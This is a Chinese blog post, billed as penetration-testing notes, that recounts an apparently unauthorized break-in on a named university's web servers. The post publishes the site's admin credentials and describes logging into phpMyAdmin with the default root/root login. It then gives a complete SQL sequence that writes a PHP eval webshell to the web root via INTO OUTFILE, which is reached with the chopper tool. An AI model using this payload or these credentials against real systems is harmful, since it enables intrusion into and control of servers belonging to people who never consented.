首页 测试 体会 查看内容

渗透测试笔记

2014-4-25 15:52| 发布者: peter_zhang| 查看: 854| 评论: 0

摘要:   今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码  账号:admin  密码:abc123456  但是,找来找去找不到后台,就让我提权试试。  我看了下:http://pxc.ncist.edu.cn/dede/   ...
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';  这段sql意思是:  1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1  2.将php一句话木马插入数据库中的xss1字段处  3.将数据库中xss1字段的内容导出到d:wwwx.php文件中  这下,通过chopper连接x.php小马得到shell
  今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码  账号:admin  密码:abc123456  但是,找来找去找不到后台,就让我提权试试。  我看了下:http://pxc.ncist.edu.cn/dede/  后台被删除了!怎么办??  google hack也没找到后台  后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin  输入默认MySql账号与密码:  账号:root  密码:root  居然进去了:  接下来就是phpmyadmin提权了:  我的思路是:  1.先爆出php服务器www的路径  2.然后通过将php一句话插入数据库再导出到www路径  通过google hack爆到路径:Dwww  呵呵,接下来就执行sql语句:
12下一页

鲜花

握手

雷人

路过

鸡蛋

扫一扫关注最新动态

毒镜头:老镜头、摄影器材资料库、老镜头样片、摄影
爱评测 aipingce.com  
返回顶部